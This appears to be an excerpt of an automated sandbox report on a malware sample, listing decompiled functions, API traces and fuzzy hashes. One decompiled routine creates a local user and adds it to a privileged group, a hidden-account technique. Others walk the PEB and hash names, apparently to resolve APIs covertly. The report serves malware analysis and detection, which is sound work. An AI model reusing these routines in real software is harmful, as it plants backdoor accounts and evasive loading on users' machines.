                                                                    • Instruction ID: 1625db47b4f9b40313df440330964e86a5cf5cf10254c6f2d213bb5ae30af4d3
                                                                    • Opcode Fuzzy Hash: 0cb732a7809ff1356e5999c785b8c6b7bdd43b3b09d6ca80a067481110f4501a
                                                                    • Instruction Fuzzy Hash: 2B312B71D00309ABDB14EFA4E988BEEBBB9EF58314F104559E515A3780EB749E48CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1D418 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 50%
                                                                    			E02D1D418(char _a4, char _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v32;
				void _v36;
				void* _t22;
				intOrPtr* _t25;
				signed int _t30;
				intOrPtr* _t38;

				_t38 = _a4;
				_t30 = 8;
				memset( &_v36, 0, _t30 << 2);
				_v36 =  *_t38;
				_v24 = 1;
				_v20 = 0;
				_v32 =  *_a8;
				_t22 =  &_v36;
				_v16 = 0;
				_v12 = 0x10201;
				_v8 = 0;
				__imp__NetUserAdd(0, 1, _t22, 0);
				_t42 = _t22;
				if(_t22 != 0) {
					L3:
					__eflags = 0;
					return 0;
				}
				_a4 =  *_t38;
				_t25 = E02D1F56D( &_a8, _t42);
				__imp__NetLocalGroupAddMembers(0,  *_t25, 3,  &_a4, 1);
				E02D15EA5(_a8);
				if(_t25 != 0) {
					goto L3;
				}
				return 1;
			}














                                                                    0x02d1d420
                                                                    0x02d1d428
                                                                    0x02d1d42e
                                                                    0x02d1d434
                                                                    0x02d1d43c
                                                                    0x02d1d43f
                                                                    0x02d1d444
                                                                    0x02d1d447
                                                                    0x02d1d44d
                                                                    0x02d1d450
                                                                    0x02d1d457
                                                                    0x02d1d45a
                                                                    0x02d1d460
                                                                    0x02d1d462
                                                                    0x02d1d493
                                                                    0x02d1d493
                                                                    0x00000000
                                                                    0x02d1d493
                                                                    0x02d1d469
                                                                    0x02d1d46c
                                                                    0x02d1d47b
                                                                    0x02d1d486
                                                                    0x02d1d48d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                    • NetUserAdd.NETAPI32(00000000,00000001,?,00000000,?,00000000,02E5E080,?,?,?,02D1E634,02E5E07C,02E5E080), ref: 02D1D45A
                                                                      • Part of subcall function 02D1F56D: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,02D1D471,?,?,00000001), ref: 02D1F5C2
                                                                      • Part of subcall function 02D1F56D: LookupAccountSidW.ADVAPI32(00000000,02D1D471,?,00000104,?,00000010,?), ref: 02D1F5E7
                                                                      • Part of subcall function 02D1F56D: GetLastError.KERNEL32(?,?,00000001), ref: 02D1F5F1
                                                                      • Part of subcall function 02D1F56D: FreeSid.ADVAPI32(02D1D471,?,?,00000001), ref: 02D1F5FF
                                                                    • NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,00010201,00000001,?,?,?,02D1E634,02E5E07C,02E5E080), ref: 02D1D47B
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Free$AccountAllocateErrorGroupInitializeLastLocalLookupMembersUserVirtual
                                                                    • String ID:
                                                                    • API String ID: 188019324-0
                                                                    • Opcode ID: 316d60de3d65a92ac2477cc438c7e9248bbbbbbfed5e882039b05f5b8534580b
                                                                    • Instruction ID: 8ca713ae66633df381b5991e1307d47e8e6b02fda2bfbb74435da1e86e5b2937
                                                                    • Opcode Fuzzy Hash: 316d60de3d65a92ac2477cc438c7e9248bbbbbbfed5e882039b05f5b8534580b
                                                                    • Instruction Fuzzy Hash: 64112472D00208AFDB15DFAAD8849EEB7F9FF59314B01442AE951EB310D774AA44CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040FE55 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileExA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0040FE93
                                                                    • FindClose.KERNEL32(00000000), ref: 0040FEBA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: 80f6f941a0db3b3c0c45d739bb512864b40ffff435a06e77faa97da734ecc396
                                                                    • Instruction ID: 038a8fb61cb237d230c685133694ded75d8cc414ee41c0c90b25892bffa1d6a0
                                                                    • Opcode Fuzzy Hash: 80f6f941a0db3b3c0c45d739bb512864b40ffff435a06e77faa97da734ecc396
                                                                    • Instruction Fuzzy Hash: 7701DB719010186ED7106A64DC819FF735DC70536CF0006FAF959E32D1E5385D454AE5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004156DB Relevance: 2.6, Strings: 2, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: U)A$U)A
                                                                    • API String ID: 0-2836072118
                                                                    • Opcode ID: 65b73f715693850ffec0fc9f25c396ad5906813cce7ddb7c1ddb68e31c867604
                                                                    • Instruction ID: add6174ef3477d1951e88cee4c9d6ab8e256457dd076e31f4fdc4ddeda1ec703
                                                                    • Opcode Fuzzy Hash: 65b73f715693850ffec0fc9f25c396ad5906813cce7ddb7c1ddb68e31c867604
                                                                    • Instruction Fuzzy Hash: B411E723F308395B374CC52E8C9337962D1EBDC600346423EE96AD62C0E464DA23E2D4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00416D23 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00416D1E,?,?,00000008,?,?,004169B1,00000000), ref: 00416F50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: d37f48bf4c3e104909b4e4161337008c83684517693bacd8f5afcc66329dcbcb
                                                                    • Instruction ID: 1589389d28c73f91bf6cfb513a086a80f1ee3063716408060e62e229d31821a5
                                                                    • Opcode Fuzzy Hash: d37f48bf4c3e104909b4e4161337008c83684517693bacd8f5afcc66329dcbcb
                                                                    • Instruction Fuzzy Hash: F9B15D362106089FD715CF28C486BA57BE1FF45364F26869DE899CF3A1C339E992CB44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00408024 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040803A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: FeaturePresentProcessor
                                                                    • String ID:
                                                                    • API String ID: 2325560087-0
                                                                    • Opcode ID: 8168f5c29d9b1f5dce2771a64f4dcb4d6f43813f93988e61cec66a89e2683f9e
                                                                    • Instruction ID: 08c22f77be665deab516b6a6e8d73e9c4e9ea2b3d0bc0547e2a5e203cb54158c
                                                                    • Opcode Fuzzy Hash: 8168f5c29d9b1f5dce2771a64f4dcb4d6f43813f93988e61cec66a89e2683f9e
                                                                    • Instruction Fuzzy Hash: 6751BDB5A01604CBEB58CF58D9857AABBF0FB98318F10842FD441EB392E7389D05DB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040B784 Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: dd0aa1ed614b0a8bf40b50611dad1ec735aff16f5d9d4b7c4f468f230bbb6051
                                                                    • Instruction ID: 38feb7ee74db4475ab10e88f9d0da7e86747e0a79f500ce1299db44615ec6a64
                                                                    • Opcode Fuzzy Hash: dd0aa1ed614b0a8bf40b50611dad1ec735aff16f5d9d4b7c4f468f230bbb6051
                                                                    • Instruction Fuzzy Hash: 795147A260460456DB38A5288895BBF639DDB81340F18893FD582F77E2D73C9D4683DE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00410931 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: HeapProcess
                                                                    • String ID:
                                                                    • API String ID: 54951025-0
                                                                    • Opcode ID: 7f0e7b7f72212444e52f522e2596f7418f22051d3498ac3a7c83494b137dfa1d
                                                                    • Instruction ID: 3ad25e0c3389eea5711c06c8053541f1debe4971f541d826d3fd0608d163c454
                                                                    • Opcode Fuzzy Hash: 7f0e7b7f72212444e52f522e2596f7418f22051d3498ac3a7c83494b137dfa1d
                                                                    • Instruction Fuzzy Hash: 1BA01130A022028BA3808F32AA083883BA8AA8228030080A8A00AC0820EB308020AA80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00415808 Relevance: .1, Instructions: 105COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cad1d90d14a7126ab0fa1995cc60725156ce9321df5267fbf48d907fe4971930
                                                                    • Instruction ID: 9931ee56fa8938d02c7a940b8cca2a765a21c3ee499369bbd0ded42e1317bef0
                                                                    • Opcode Fuzzy Hash: cad1d90d14a7126ab0fa1995cc60725156ce9321df5267fbf48d907fe4971930
                                                                    • Instruction Fuzzy Hash: BF21A473F2053847770CC47E8C562BDB6E1C68C501745827AE9A6DA2C1E968D927E2E4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D21BF8 Relevance: .1, Instructions: 63COMMONCrypto
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 83%
                                                                    			E02D21BF8(void* __ecx, signed int __edx, signed int _a4, signed int* _a8) {
				void* _t13;
				signed int* _t25;
				void* _t26;
				signed int _t33;
				signed int _t35;
				signed int _t42;
				signed int _t43;
				signed int _t48;
				signed int _t49;
				signed char* _t52;

				_t33 = __edx;
				asm("cdq");
				_t42 = __edx & 0x00000003;
				_t43 = _a4;
				_t48 = _t42 + __edx >> 2;
				_t52 = __ecx + _t48 * 4;
				_t49 =  ~_t48;
				if(_t42 != 0) {
					do {
						asm("rol eax, 0xf");
						asm("rol eax, 0xd");
						_t43 = ( *(_t52 + _t49 * 4) * 0xcc9e2d51 * 0x1b873593 ^ _t43) * 5 - 0x19ab949c;
						_t49 = _t49 + 1;
					} while (_t49 != 0);
				}
				_t35 = 0;
				_t13 = (_t33 & 0x00000003) - 1;
				if(_t13 == 0) {
					L7:
					asm("rol eax, 0xf");
					_t43 = _t43 ^ ( *_t52 & 0x000000ff ^ _t35) * 0xcc9e2d51 * 0x1b873593;
				} else {
					_t26 = _t13 - 1;
					if(_t26 == 0) {
						L6:
						_t35 = _t35 ^ (_t52[1] & 0x000000ff) << 0x00000008;
						goto L7;
					} else {
						if(_t26 == 1) {
							_t35 = (_t52[2] & 0x000000ff) << 0x10;
							goto L6;
						}
					}
				}
				_t25 = _a8;
				 *_t25 = (((_t43 ^ _t33) >> 0x00000010 ^ _t43 ^ _t33) * 0x85ebca6b >> 0x0000000d ^ ((_t43 ^ _t33) >> 0x00000010 ^ _t43 ^ _t33) * 0x85ebca6b) * 0xc2b2ae35 >> 0x00000010 ^ (((_t43 ^ _t33) >> 0x00000010 ^ _t43 ^ _t33) * 0x85ebca6b >> 0x0000000d ^ ((_t43 ^ _t33) >> 0x00000010 ^ _t43 ^ _t33) * 0x85ebca6b) * 0xc2b2ae35;
				return _t25;
			}













                                                                    0x02d21bfc
                                                                    0x02d21c00
                                                                    0x02d21c01
                                                                    0x02d21c09
                                                                    0x02d21c0c
                                                                    0x02d21c0f
                                                                    0x02d21c12
                                                                    0x02d21c14
                                                                    0x02d21c16
                                                                    0x02d21c1d
                                                                    0x02d21c28
                                                                    0x02d21c2e
                                                                    0x02d21c34
                                                                    0x02d21c34
                                                                    0x02d21c16
                                                                    0x02d21c3b
                                                                    0x02d21c40
                                                                    0x02d21c43
                                                                    0x02d21c5f
                                                                    0x02d21c6a
                                                                    0x02d21c73
                                                                    0x02d21c45
                                                                    0x02d21c45
                                                                    0x02d21c48
                                                                    0x02d21c56
                                                                    0x02d21c5d
                                                                    0x00000000
                                                                    0x02d21c4a
                                                                    0x02d21c4d
                                                                    0x02d21c53
                                                                    0x00000000
                                                                    0x02d21c53
                                                                    0x02d21c4d
                                                                    0x02d21c48
                                                                    0x02d21c9b
                                                                    0x02d21c9e
                                                                    0x02d21ca1

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ee9a03c5baf9720a6e7d8e5d675cdaadf48f2bf7d7bc5066cbb6e6d82dfa4c0b
                                                                    • Instruction ID: 5248974946718da3f0d3a2f5d43c24974c26924d13b39cddf1d48e165d4431aa
                                                                    • Opcode Fuzzy Hash: ee9a03c5baf9720a6e7d8e5d675cdaadf48f2bf7d7bc5066cbb6e6d82dfa4c0b
                                                                    • Instruction Fuzzy Hash: D81148323505210A872C9C3E4D57067FBCBD3C9014748D53EE99FCB352E531E70A9680
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040FB09 Relevance: .0, Instructions: 23COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 72f9bda1e34f90da71cd9cf11ecf6e4695a8bf6c74432d80b894c9ec6b43e2a8
                                                                    • Instruction ID: f40bb324475060c3110c6da8a23151635de457e1c8f8d9b65f1d3824af98e468
                                                                    • Opcode Fuzzy Hash: 72f9bda1e34f90da71cd9cf11ecf6e4695a8bf6c74432d80b894c9ec6b43e2a8
                                                                    • Instruction Fuzzy Hash: 74E0D632956228EBC720CAC8D80088AF3BCEB08B00B0000BBB804E3600C234EE00CBC0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D20620 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D20620() {
				intOrPtr* _t10;
				intOrPtr* _t11;

				_t10 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14;
				_t11 =  *_t10;
				while(_t11 != _t10) {
					if(E02D206DE( *((intOrPtr*)(_t11 + 0x28))) == 0) {
						return  *((intOrPtr*)(_t11 + 0x10));
					}
					_t11 =  *_t11;
				}
				return 0;
			}





                                                                    0x02d2062b
                                                                    0x02d2062e
                                                                    0x02d20640
                                                                    0x02d2063c
                                                                    0x00000000
                                                                    0x02d20649
                                                                    0x02d2063e
                                                                    0x02d2063e
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                                                    • Instruction ID: 966b6e3e293aa16d75bb7db1b991373ae5be56495f330734d171842cfc5b454f
                                                                    • Opcode Fuzzy Hash: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                                                    • Instruction Fuzzy Hash: E7E08C322005B0CBC630DB1AD440B12B3B5EBF067BB1A0468E48AA3700C320FC09CAA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D2094E Relevance: .0, Instructions: 11COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D2094E() {
				intOrPtr _t4;

				_t4 =  *[fs:0x30];
				if(_t4 == 0) {
					return 0;
				} else {
					return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t4 + 0xc)) + 0xc)))))) + 0x18));
				}
			}




                                                                    0x02d2094e
                                                                    0x02d20956
                                                                    0x02d20968
                                                                    0x02d20958
                                                                    0x02d20965
                                                                    0x02d20965

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                                                    • Instruction ID: bf8c6c44afdc0168db363bb7797cc370ca9937b5e5e89a27914988d421ddb04d
                                                                    • Opcode Fuzzy Hash: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                                                    • Instruction Fuzzy Hash: D7D0EA383619408FDB51CF18C684E01B3E4EB69A65B098491E90ADB735D734ED00EA00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D20619 Relevance: .0, Instructions: 2COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D20619() {

				return  *[fs:0x30];
			}



                                                                    0x02d2061f

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                    • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004068B0 Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 261windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
